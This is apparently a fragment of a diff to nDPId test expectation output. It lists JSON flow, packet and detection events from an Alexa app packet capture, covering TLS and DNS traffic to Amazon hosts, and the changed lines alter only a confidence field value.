00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1490976042054,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042054,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8AfNAAEAGW7OsECrYNFXR2NSNAbumNE9OAAAAAKAC\/\/9PagAAAgQFtAQCCAoA9k69AAAAAAEDAwg="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1490976042056,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042056,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71Iw+cfkHGE+VGqAScSB8QwAAAgQFtAQCCAps\/wWhAPZOtAEDAwg="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1490976042057,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976042057,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0265AAEAGgf+sECrYNFXR2NSMAbsYT5UaPnH5CIAQAVca0QAAAQEICgD2Tr1s\/wWh"} -00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041961,"flow_last_seen":1490976042058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976042058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":269,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041942,"flow_last_seen":1490976042081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1490976042081,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":271,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976041942,"flow_last_seen":1490976042082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1490976042082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041961,"flow_last_seen":1490976042058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976042058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":269,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041942,"flow_last_seen":1490976042081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1490976042081,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":271,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976041942,"flow_last_seen":1490976042082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1490976042082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1490976042099,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042099,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71I2zekUSpjRPT6AScSDSoAAAAgQFtAQCCAptF6XzAPZOvQEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1490976042101,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976042101,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0AfRAAEAGW7qsECrYNFXR2NSNAbumNE9Ps3pFE4AQAVdxMgAAAQEICgD2TsJtF6Xz"} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041961,"flow_last_seen":1490976042149,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976042149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041961,"flow_last_seen":1490976042150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976042150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4834,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041961,"flow_last_seen":1490976042149,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976042149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041961,"flow_last_seen":1490976042150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976042150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4834,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1490976042419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042419,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G69AAEAGvmqsECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/VegAAAgQFtAQCCAoA9k7iAAAAAAEDAwg="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1490976043609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043609,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzNAAEAGfuasECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9jeAAAAgQFtAQCCAoA9k78AAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1490976043611,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1490976043611,"pkt":"AMDKkaPvePiC0\/vCCABFAAA\/WlZAAEARM16sECrYrBAqAalWADUAK0G7veEBAAABAAAAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAE="} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00190{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":392,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976043617} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":392,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976043612,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1490976043811,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1490976043811,"pkt":"ePiC0\/vCAMDKkaPvCABFAABP0pFAAEARuxKsECoBrBAq2AA1qVYAO\/ZCveGBgAABAAEAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAHADAABAAEAAAAbAARIFc6H"} -00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976043811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.135"}} +00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976043811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.135"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1490976043814,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043814,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JoxAAEAGJqusECrYSBXOh6SRAbtDcGnhAAAAAKAC\/\/+2eAAAAgQFtAQCCAoA9k9tAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 